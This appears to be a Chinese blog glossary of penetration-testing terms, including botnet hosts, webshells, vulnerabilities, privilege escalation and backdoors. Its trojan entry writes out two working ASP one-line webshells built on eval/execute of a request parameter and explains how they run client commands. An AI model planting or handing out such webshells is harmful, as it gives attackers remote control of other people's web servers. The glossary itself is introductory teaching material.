1 一些前置知识(包含但不限于)
脚本(asp、php、jsp、aspx)
html(css、js、html)
HTTP协议
CMS(B/S)
2 肉鸡
被黑客入侵并被长期驻扎的计算机或服务器。可以随意控制,可以是任意系统的设备,对象可以是企
业,个人,政府等等所有单位。
3 抓鸡
利用使用量大的程序的漏洞,使用自动化方式获取肉鸡的行为。
4 Webshell
通过Web入侵的一种脚本工具,可以据此对网站服务进行一定程度的控制。
5 漏洞
硬件、软件、协议等等的可利用安全缺陷,可能被攻击者利用,对数据进行篡改,控制等。
6 木马
通过向服务端提交一句简短的代码,配合本地客户端实现webshell功能的木马。
<%eval request(“pass”)%>
<%execute(request(“pass”))%>
request(“pass”)接收客户端提交的数据,pass为执行命令的参数值。
eval/execute 函数执行客户端命令的内容
7 提权
操作系统低权限的账户将自己提升为管理员权限使用的方法。
Guest —user—administrator----system
user—samba–ftp— root
8 后门
黑客为了对主机进行长期的控制,在机器上种植的一段程序或留下的一个“入口
渗透测试相关名词解析
最新推荐文章于 2023-01-12 10:19:43 发布